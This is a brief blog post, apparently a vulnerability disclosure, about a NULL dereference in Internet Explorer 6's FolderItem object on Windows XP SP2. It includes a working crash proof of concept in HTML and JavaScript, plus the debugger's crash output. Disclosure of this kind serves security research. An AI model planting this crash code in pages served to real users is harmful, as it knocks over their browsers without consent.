The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)
<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>
var a = document.getElementById('target');
alert(a.object);
Demonstration
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment